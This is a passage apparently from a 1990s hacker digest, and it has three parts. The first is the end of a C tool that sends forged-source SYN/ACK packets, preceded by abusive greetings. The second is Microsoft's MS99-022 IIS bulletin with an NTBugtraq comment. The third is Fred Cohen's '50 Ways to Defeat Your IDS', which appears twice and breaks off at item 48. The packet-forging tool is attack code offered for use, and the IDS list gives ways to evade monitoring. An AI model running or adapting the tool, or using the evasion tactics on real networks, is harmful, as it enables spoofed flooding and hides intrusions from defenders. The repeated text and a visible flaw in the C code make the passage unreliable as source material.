cocksucking piece of shit son-of-a-bitch, I wish you nothing but pain. * Nsurfer~1 for being the lamest BO user ever * the fuckheads in #trenchcoatmafia (hey code you remember how they fell like rocks?? :-)) *******************************************************************************************************/ /*--------- code ----------- */ #define _BSD_SOURCE /* BSD compatibility */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct pseudo { u_long saddr; u_long daddr; u_char zero; u_char protocol; u_short length; }; unsigned short in_cksum (unsigned short *ptr, int nbytes) { register long sum; /* assumes long == 32 bits */ u_short oddbyte; register u_short answer; /* assumes u_short == 16 bits */ /* * Our algorithm is simple, using a 32-bit accumulator (sum), * we add sequential 16-bit words to it, and at the end, fold back * all the carry bits from the top 16 bits into the lower 16 bits. */ sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } /* mop up an odd byte, if necessary */ if (nbytes == 1) { oddbyte = 0; /* make sure top half is zero */ *((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */ sum += oddbyte; } /* * Add back carry outs from top 16 bits to low 16 bits. */ sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* ones-complement, then truncate to 16 bits */ return (answer); } int sendpack( int s, u_long srcaddr, u_short srcport, u_long dstaddr, u_short dstport,u_short th_flags, u_char *packet,u_long length) { u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)]; struct sockaddr_in foo; struct in_addr srcinaddr,dstinaddr; struct ip *ip = (struct ip *) packet; struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip)); struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip) + sizeof(struct pseudo)); bzero(packet, sizeof(packet)); bzero(&foo,sizeof(foo)); /* only BSD, linux has plain u_long declared */ srcinaddr.s_addr = srcaddr; dstinaddr.s_addr = dstaddr; /* building packets */ pseudo->saddr = srcaddr; pseudo->daddr = dstaddr; pseudo->zero = 0; pseudo->protocol=IPPROTO_TCP; pseudo->length = htons(sizeof (struct tcphdr)); ip->ip_v = 4; /* 4 */ ip->ip_hl = 5; /* 5 */ ip->ip_id = 1234; /* 1234 */ ip->ip_src = srcinaddr; ip->ip_dst = dstinaddr; ip->ip_p = IPPROTO_TCP; ip->ip_ttl = 40; /* 40 */ ip->ip_off = 0; ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr) + length; tcp->th_sport = htons(srcport); tcp->th_dport = htons(dstport); tcp->th_seq = htonl(rand()); tcp->th_ack = htonl(rand()); tcp->th_off=1; tcp->th_flags = th_flags; tcp->th_urp = 0; /* 0 */ tcp->th_sum = in_cksum((u_short *) pseudo, sizeof(struct pseudo) + sizeof(struct tcphdr)); bcopy(tcp,pseudo,sizeof(struct tcphdr)); foo.sin_family=AF_INET; foo.sin_addr.s_addr=dstaddr; sendto(s,packet,sizeof(struct ip) + sizeof(struct tcphdr) + length, 0, (struct sockaddr *) &foo,sizeof(foo)); return 0; } void usage(char *name) { fprintf(stderr,"\x1B[0;34mP.A.T.C.H. production - misteri0\x1B[0;0m\n"); fprintf(stderr,"\x1B[1;36mUsage: \x1B[0;31m%s \x1B[1;32m[\x1B[0;36msrcip\x1B[1;32m] \x1B[1;32m[\x1B[0;36msrc start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdstip\x1B[1;32m] \x1B[1;32m[\x1B[0;36mdst start port\x1B[1;32m] \x1B[1;32m[\x1B[0;36mcount\x1B[1;32m]\x1B[0;0m\n",name); fprintf(stderr,"\x1B[0;35mNote: \x1B[0;33mThe source/destination ports will increment by 1\x1B[0;0m\n"); exit(1); } u_long resolve_name(char *hostname) { struct hostent *host; u_long addr; if ((addr = inet_addr(hostname)) != -1) return addr; if ((host = gethostbyname(hostname)) == NULL) { fprintf(stderr,"Can not resolve name: %s\n",hostname); exit(1); } bcopy(host->h_addr,&addr,host->h_length); return addr; } int main(argc,argv) int argc; char **argv; { int rawfd,rd,rsize; int count; /* don't know why I made it so complicated, *sigh* oh well, gets the job done.. */ int one=1; u_char buf[1024]; struct sockaddr_in raddr; struct ifreq ifr; struct in_addr srcip,dstip; u_short srcport,dstport; if (argc!=6) usage(argv[0]); srcip.s_addr = resolve_name(argv[1]); srcport = atoi(argv[2]); dstip.s_addr = resolve_name(argv[3]); dstport = atoi(argv[4]); if ((rawfd=socket(PF_INET,SOCK_RAW,IPPROTO_ICMP))<0) { perror("RawSocket:"); exit(1); } if (setsockopt(rawfd,IPPROTO_IP,IP_HDRINCL,&one,sizeof(one))<0) { perror("SetSockOpt:"); close(rawfd); exit(1); } count=0; while(atoi(argv[5]) > count) { count++; printf("sending packet from: %s:%i ",inet_ntoa(srcip),srcport); printf("to %s:%i\n",inet_ntoa(dstip),dstport); /* think about it, =-) */ srcport = srcport + 1; dstport = dstport + 1; sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_SYN,NULL,0); sendpack(rawfd,srcip.s_addr,srcport,dstip.s_addr,dstport,TH_ACK,NULL,0); usleep(1000); } /* printf("starting.."); for(;;) { printf("foo.."); fflush(stdout); if ((rd=recvfrom(rawfd,buf,1024,0,(struct sockaddr *)&raddr,&rsize))<0) break; printf("%i\n",rd); }*/ close(rawfd); return(0); } 103.0 Double-byte code vulnerability, MS Security Bulletin ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 25 Jun 1999 10:18:46 -0700 From: aleph1@UNDERGROUND.ORG To: BUGTRAQ@netspace.org Subject: Microsoft Security Bulletin (MS99-022) The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-022) -------------------------------------- Patch Available for "Double Byte Code Page" Vulnerability Originally Posted: June 24, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in Microsoft(r) Internet Information Server that could allow a web site visitor to view the source code for selected files on the server, if the server's default language is set to Chinese, Japanese or Korean. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-022faq.asp Issue ===== When IIS is run on a machine on which a double-byte character set code page is used (i.e., the default language on the server is set to Chinese, Japanese, or Korean), and a specific URL construction is used to request a file in a virtual directory, normal server-side processing is bypassed. As a result, the file is simply delivered as text to the browser, thereby allowing the source code to be viewed. Affected Software Versions ========================== - Microsoft Internet Information Server 3.0 and 4.0, if run on a server whose default language is set to Chinese, Korean, or Japanese Patch Availability ================== - English: ftp://ftp.microsoft.com/bussys/iis/iis-public/ fixes/usa/security/fesrc-fix - Simplified Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/ fixes/chs/security/fesrc-fix - Traditional Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/ fixes/cht/security/fesrc-fix - Japanese: ftp://ftp.microsoft.com/bussys/iis/iis-public/ fixes/jpn/security/fesrc-fix - Korean: ftp://ftp.microsoft.com/bussys/iis/iis-public/ fixes/kor/security/fesrc-fix NOTE: Line breaks have inserted into the above URLs for readability NOTE: Apply the patch corresponding to the language version of IIS, rather than the current default language on the server. For example, if you have the English version of IIS but have reset the default language on the server to Chinese, apply the English patch. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-022: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-022faq.asp. - Microsoft Knowledge Base (KB) article Q233335, "Page Contents Visible When Certain Characters are at End of URL", http://support.microsoft.com/support/kb/articles/q233/3/35.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible; however, a copy will be immediately available in the patch folder) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. - IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Revisions ========= - June 24, 1999: Bulletin Created. ------------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. -------------------------------------------------------------------------------- Date: Fri, 25 Jun 1999 17:33:22 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Alert: Microsoft Security Bulletin (MS99-022) - Double Byte Code Page Vulnerability -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ok, Microsoft released this one yesterday and I needed to get a little clarification before I sent it on to you. Basically, we have an unknown vulnerability against IIS on NT boxes that have chosen an "Input Locale" of Chinese, Korean, or Japanese. These languages all use a double-byte code page set to represent the language characters. A "munged" URL can fool such an IIS server into providing the source for the page instead of the display (similar to the way ::$DATA worked). So, if you're like me, you're wondering a couple of things; Q: How do I know I might be affected by this? A: If you got a version of NT for any language other than Chinese, Korean, or Japanese, then you would had to have installed the "Far East Language Pack" to make these languages available on your machine. Then, assuming you did install this pack, you would have to have gone into Control Panel/Regional Settings/Input Locale, and actually chosen one of them as your default language. If you haven't done this, be not afraid. The other way is if you got a Chinese, Korean, or Japanese version of NT and have left the Input Locale to that language (or have chosen one of the other languages). If, however, you have chose, e.g. EN (English), then you're not susceptible. Confused yet? Of course it also goes without saying that you have to be running IIS on this box too. Q: What is the attack? A: Wouldn't we all like to know. This one is internally discovered by MS, so we don't have any details of what exactly is the vulnerability (other than knowing you're subject to the vulnerability using the products described above). Good show for MS telling us about the patch, we'll see if they can come clean on some level of detail of the actual exploit...would really show how much the MS Security approach has changed, wouldn't it...;-] MS99-022 FAQ http://www.microsoft.com/security/bulletins/MS99-022faq.asp Patches at ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ English: usa/security/fesrc-fix Simplified Chinese: chs/security/fesrc-fix Traditional Chinese: cht/security/fesrc-fix Japanese: jpn/security/fesrc-fix Korean: kor/security/fesrc-fix Sorry for the delay in bringing you this rather sparse amount of additional info. Cheers, Russ - NTBugtraq Editor -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 iQA/AwUBN3P1o8+Ua7J6A+woEQIb/wCgkaPzuN3yAPxsbdSSYAatsZkGgiUAoI+O eDCaxqG/VC+pDg1q0mdLwTLN =F7rQ -----END PGP SIGNATURE----- 104.0 50 Ways to defeat your IDS ~~~~~~~~~~~~~~~~~~~~~~~~~~ By Fred Cohen Managing Network Security 50 Ways to Defeat Your Intrusion Detection System by Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/ Series Introduction Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of information protection have not kept up. As a result, the success of information security programs has increasingly become a function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a management view of protection and seeks to reconcile the need for security with the limitations of technology. Background and Introduction: This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer Security Center / National Institute of Science and Technology conference. I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth the effort to implement them. (My actual words were a bit less polite, but you get the idea). After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50 Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was surprised when I asked him when he needed it. The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample, they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways (plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he got home. Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them at the same time. Original Introduction: In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e., stone aged) intrusion detection systems. Background: From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper decision and vendors seem to be taking advantage of this knowledge vacuum to make sales. I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these examples are serious and these examples are only the tip of the iceberg. The 50 Ways: 1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance. 2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell. 3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator. This would confuse detection systems almost without exception. 4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection systems would rank the one they were not tuned to find as unlikely to be an actual attack. 5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’ the attack is almost certain to go undetected. 6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’. 7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’ from site X. 8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use ‘$ZZ’ instead of ‘cp’ where appropriate. 9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’. 10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use for the scripts to the commands and will miss the whole attack. Bonus attack - Add comments to attack lines in an attack that would otherwise be detected. 11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell. 12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’. 13 - Create a code-book translater for attack keywords. This can be done by piping all commands through a filter program – perhaps using ‘sed’ to do string substitution. 14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently coded, the detector will be unable to decode your actions. 15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping – including snooping by the IDS. 16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand the syntax. 17 - Turn on full duplex communications mode wit the target. The extra characters going back and forth may confuse the IDS. 18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of the attacks. 19 – encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to ‘-‘s. 20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS. Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls. So you might send ’15 *.com’ and the victim system might do ‘dir *.com’. 21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port unable to receive further sensor inputs. 22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed, causing them to fail to detect subsequent attacks. 23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the platform is taken over, the IDS can be subverted. 24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might indicate an attack and containing information makes the attack actions look harmless. 25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected. 26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the system running the IDS may not be able to create the process needed to generate an audit record. 27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked at will. 28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you. 29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the traffic. 30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things like control-W and control-Y while the command interpreter on the victim site will see malicious commands. Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch. 31 - Change routes to target to avoid the IDS. 32 - Change return routes from target to avoid the IDS. 33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS. 34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will miss these packets. 35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this is often possible by modifying router traffic (as a simple example). 36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to trace it to you (unless they are very good at traces). 37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems. 38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings for examples). 39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content. 40 - Use a different tunneled protocol session for the attack – such as IP over HTML. Bonus Attack - Define your own protocol for a new application and attack over it. 41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity. 42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and people tend to fail under these circumstances. 43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the attack inside the macro. 44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea. 45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you. 46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets. 47 - Recode the attack in a different language than it was originally published in. 48 – Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t detect many of the common attacks used by attackers today. 49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.) 50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50! Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of known attacks. Afterward: This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content. What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a private email I sent to one of these folks: Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious paper is the national infosec technical baseline, but it apparently engendered no such discussion. When will I learn that people ignore my serious work and pay lots of attention to my play pieces. Summary and Conclusions: I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went back and recounted, and I am pretty sure I have exceeded my goal of 50 ways. If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion, laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I hadn’t told all those decision makers how to ask the tough questions about your product. The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by the acquisition, configuration, or operation costs. I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays. About The Author: Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be reached by sending email to fc@all.net. Managing Network Security 50 Ways to Defeat Your Intrusion Detection System by Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/ Series Introduction Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of information protection have not kept up. As a result, the success of information security programs has increasingly become a function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a management view of protection and seeks to reconcile the need for security with the limitations of technology. Background and Introduction: This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer Security Center / National Institute of Science and Technology conference. I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth the effort to implement them. (My actual words were a bit less polite, but you get the idea). After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50 Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was surprised when I asked him when he needed it. The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample, they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways (plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he got home. Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them at the same time. Original Introduction: In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e., stone aged) intrusion detection systems. Background: From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper decision and vendors seem to be taking advantage of this knowledge vacuum to make sales. I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these examples are serious and these examples are only the tip of the iceberg. The 50 Ways: 1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance. 2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell. 3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator. This would confuse detection systems almost without exception. 4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection systems would rank the one they were not tuned to find as unlikely to be an actual attack. 5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’ the attack is almost certain to go undetected. 6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’. 7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’ from site X. 8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use ‘$ZZ’ instead of ‘cp’ where appropriate. 9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’. 10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use for the scripts to the commands and will miss the whole attack. Bonus attack - Add comments to attack lines in an attack that would otherwise be detected. 11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell. 12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’. 13 - Create a code-book translater for attack keywords. This can be done by piping all commands through a filter program – perhaps using ‘sed’ to do string substitution. 14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently coded, the detector will be unable to decode your actions. 15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping – including snooping by the IDS. 16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand the syntax. 17 - Turn on full duplex communications mode wit the target. The extra characters going back and forth may confuse the IDS. 18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of the attacks. 19 – encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to ‘-‘s. 20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS. Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls. So you might send ’15 *.com’ and the victim system might do ‘dir *.com’. 21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port unable to receive further sensor inputs. 22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed, causing them to fail to detect subsequent attacks. 23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the platform is taken over, the IDS can be subverted. 24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might indicate an attack and containing information makes the attack actions look harmless. 25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected. 26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the system running the IDS may not be able to create the process needed to generate an audit record. 27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked at will. 28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you. 29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the traffic. 30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things like control-W and control-Y while the command interpreter on the victim site will see malicious commands. Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch. 31 - Change routes to target to avoid the IDS. 32 - Change return routes from target to avoid the IDS. 33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS. 34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will miss these packets. 35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this is often possible by modifying router traffic (as a simple example). 36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to trace it to you (unless they are very good at traces). 37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems. 38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings for examples). 39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content. 40 - Use a different tunneled protocol session for the attack – such as IP over HTML. Bonus Attack - Define your own protocol for a new application and attack over it. 41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity. 42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and people tend to fail under these circumstances. 43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the attack inside the macro. 44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea. 45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you. 46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets. 47 - Recode the attack in a different language than it was originally published in. 48 – Use any non-technical 